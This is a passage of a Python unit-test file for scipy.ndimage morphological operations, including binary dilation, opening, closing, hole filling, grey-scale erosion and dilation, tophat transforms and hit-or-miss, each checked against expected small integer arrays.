[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, origin=(1, 1), border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_dilation26(self):
struct = ndimage.generate_binary_structure(2, 2)
expected = [[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, expected)
def test_binary_dilation27(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, expected)
def test_binary_dilation28(self):
expected = [[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 1]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_dilation29(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 0]], bool)
out = ndimage.binary_dilation(data, struct, iterations=2)
assert_array_almost_equal(out, expected)
def test_binary_dilation30(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_dilation(data, struct, iterations=2, output=out)
assert_array_almost_equal(out, expected)
def test_binary_dilation31(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 0],
[0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 0]], bool)
out = ndimage.binary_dilation(data, struct, iterations=3)
assert_array_almost_equal(out, expected)
def test_binary_dilation32(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 0],
[0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_dilation(data, struct, iterations=3, output=out)
assert_array_almost_equal(out, expected)
def test_binary_dilation33(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_dilation(data, struct, iterations=-1,
mask=mask, border_value=0)
assert_array_almost_equal(out, expected)
def test_binary_dilation34(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.zeros(mask.shape, bool)
out = ndimage.binary_dilation(data, struct, iterations=-1,
mask=mask, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_dilation35(self):
tmp = [[1, 1, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 1, 0, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, 0, 1, 0, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]])
mask = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
expected = numpy.logical_and(tmp, mask)
tmp = numpy.logical_and(data, numpy.logical_not(mask))
expected = numpy.logical_or(expected, tmp)
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, mask=mask,
origin=(1, 1), border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_propagation01(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_propagation(data, struct,
mask=mask, border_value=0)
assert_array_almost_equal(out, expected)
def test_binary_propagation02(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.zeros(mask.shape, bool)
out = ndimage.binary_propagation(data, struct,
mask=mask, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_opening01(self):
expected = [[0, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 0, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_opening(data)
assert_array_almost_equal(out, expected)
def test_binary_opening02(self):
struct = ndimage.generate_binary_structure(2, 2)
expected = [[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_opening(data, struct)
assert_array_almost_equal(out, expected)
def test_binary_closing01(self):
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 0, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_closing(data)
assert_array_almost_equal(out, expected)
def test_binary_closing02(self):
struct = ndimage.generate_binary_structure(2, 2)
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_closing(data, struct)
assert_array_almost_equal(out, expected)
def test_binary_fill_holes01(self):
expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_fill_holes(data)
assert_array_almost_equal(out, expected)
def test_binary_fill_holes02(self):
expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_fill_holes(data)
assert_array_almost_equal(out, expected)
def test_binary_fill_holes03(self):
expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 0, 1, 1, 1],
[0, 0, 1, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 1, 1, 1],
[0, 1, 0, 1, 0, 1, 0, 1],
[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 1, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_fill_holes(data)
assert_array_almost_equal(out, expected)
def test_grey_erosion01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
output = ndimage.grey_erosion(array, footprint=footprint)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], output)
def test_grey_erosion01_overlap(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
ndimage.grey_erosion(array, footprint=footprint, output=array)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], array)
def test_grey_erosion02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
output = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[2, 2, 1, 1, 1],
[2, 3, 1, 3, 1],
[5, 5, 3, 3, 1]], output)
def test_grey_erosion03(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[1, 1, 1], [1, 1, 1]]
output = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[1, 1, 0, 0, 0],
[1, 2, 0, 2, 0],
[4, 4, 2, 2, 0]], output)
def test_grey_dilation01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
output = ndimage.grey_dilation(array, footprint=footprint)
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_grey_dilation02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
structure = [[0, 0, 0], [0, 0, 0]]
output = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[7, 7, 9, 9, 5],
[7, 9, 8, 9, 7],
[8, 8, 8, 7, 7]], output)
def test_grey_dilation03(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[0, 1, 1], [1, 0, 1]]
structure = [[1, 1, 1], [1, 1, 1]]
output = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
assert_array_almost_equal([[8, 8, 10, 10, 6],
[8, 10, 9, 10, 8],
[9, 9, 9, 8, 8]], output)
def test_grey_opening01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
tmp = ndimage.grey_erosion(array, footprint=footprint)
expected = ndimage.grey_dilation(tmp, footprint=footprint)
output = ndimage.grey_opening(array, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_grey_opening02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = ndimage.grey_dilation(tmp, footprint=footprint,
structure=structure)
output = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_grey_closing01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
tmp = ndimage.grey_dilation(array, footprint=footprint)
expected = ndimage.grey_erosion(tmp, footprint=footprint)
output = ndimage.grey_closing(array, footprint=footprint)
assert_array_almost_equal(expected, output)
def test_grey_closing02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
expected = ndimage.grey_erosion(tmp, footprint=footprint,
structure=structure)
output = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_morphological_gradient01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 - tmp2
output = numpy.zeros(array.shape, array.dtype)
ndimage.morphological_gradient(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_morphological_gradient02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 - tmp2
output = ndimage.morphological_gradient(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_morphological_laplace01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 + tmp2 - 2 * array
output = numpy.zeros(array.shape, array.dtype)
ndimage.morphological_laplace(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_morphological_laplace02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp1 = ndimage.grey_dilation(array, footprint=footprint,
structure=structure)
tmp2 = ndimage.grey_erosion(array, footprint=footprint,
structure=structure)
expected = tmp1 + tmp2 - 2 * array
output = ndimage.morphological_laplace(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_white_tophat01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
expected = array - tmp
output = numpy.zeros(array.shape, array.dtype)
ndimage.white_tophat(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_white_tophat02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_opening(array, footprint=footprint,
structure=structure)
expected = array - tmp
output = ndimage.white_tophat(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_white_tophat03(self):
array = numpy.array([[1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
expected = numpy.array([[0, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 1, 1, 1, 0],
[1, 0, 0, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 0, 1],
[0, 1, 1, 0, 1, 0, 1],
[0, 1, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 1]], dtype=numpy.bool_)
output = ndimage.white_tophat(array, structure=structure)
assert_array_equal(expected, output)
def test_white_tophat04(self):
array = numpy.eye(5, dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
# Check that type mismatch is properly handled
output = numpy.empty_like(array, dtype=numpy.float64)
ndimage.white_tophat(array, structure=structure, output=output)
def test_black_tophat01(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
expected = tmp - array
output = numpy.zeros(array.shape, array.dtype)
ndimage.black_tophat(array, footprint=footprint,
structure=structure, output=output)
assert_array_almost_equal(expected, output)
def test_black_tophat02(self):
array = numpy.array([[3, 2, 5, 1, 4],
[7, 6, 9, 3, 5],
[5, 8, 3, 7, 1]])
footprint = [[1, 0, 1], [1, 1, 0]]
structure = [[0, 0, 0], [0, 0, 0]]
tmp = ndimage.grey_closing(array, footprint=footprint,
structure=structure)
expected = tmp - array
output = ndimage.black_tophat(array, footprint=footprint,
structure=structure)
assert_array_almost_equal(expected, output)
def test_black_tophat03(self):
array = numpy.array([[1, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 1]], dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
expected = numpy.array([[0, 1, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 1],
[1, 0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 1, 0]], dtype=numpy.bool_)
output = ndimage.black_tophat(array, structure=structure)
assert_array_equal(expected, output)
def test_black_tophat04(self):
array = numpy.eye(5, dtype=numpy.bool_)
structure = numpy.ones((3, 3), dtype=numpy.bool_)
# Check that type mismatch is properly handled
output = numpy.empty_like(array, dtype=numpy.float64)
ndimage.black_tophat(array, structure=structure, output=output)
def test_hit_or_miss01(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 1, 0, 1, 1],
[0, 0, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 1],
[0, 1, 1, 1, 1],
